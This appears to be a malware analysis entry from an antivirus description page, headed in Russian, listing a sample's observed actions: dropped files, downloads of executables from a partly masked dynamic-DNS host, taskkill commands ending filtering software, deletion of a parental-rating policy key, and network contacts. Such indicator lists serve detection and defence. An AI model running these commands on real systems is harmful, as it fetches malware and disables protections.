Техническая информация
- '%WINDIR%\ehome\wmild.exe' -c http://ka####rf.zapto.org/zanyserv.exe
- '%WINDIR%\ehome\wmild.exe' -c http://ka####rf.zapto.org/SURFSET.exe
- '<SYSTEM32>\taskkill.exe' /f /im safesurf.exe
- '<SYSTEM32>\taskkill.exe' /f /im surfguard.exe
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
- '<SYSTEM32>\taskkill.exe' /f /im nvidsrv.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\ehome\SER.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im ipz.exe
- '<SYSTEM32>\taskkill.exe' /f /im ipz2.exe
- %WINDIR%\ehome\DPS.bat
- %WINDIR%\ehome\readcac.exe
- %WINDIR%\ehome\wmild.exe
- %WINDIR%\ehome\apsql.exe
- %WINDIR%\ehome\zanyserv.exe
- %WINDIR%\ehome\SURFSET.exe
- %WINDIR%\ehome\sDPS.bat
- %WINDIR%\ehome\cmsdll.exe
- %WINDIR%\ehome\SER.bat
- %WINDIR%\ehome\DNS.bat
- %WINDIR%\ehome\instsrv.exe
- %WINDIR%\ehome\SETA.bat
- %WINDIR%\ehome\ser.reg
- %WINDIR%\ehome\sc.exe
- 'ka####rf.zapto.org':80
- ka####rf.zapto.org/zanyserv.exe
- ka####rf.zapto.org/SURFSET.exe
- DNS ASK ka####rf.zapto.org
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''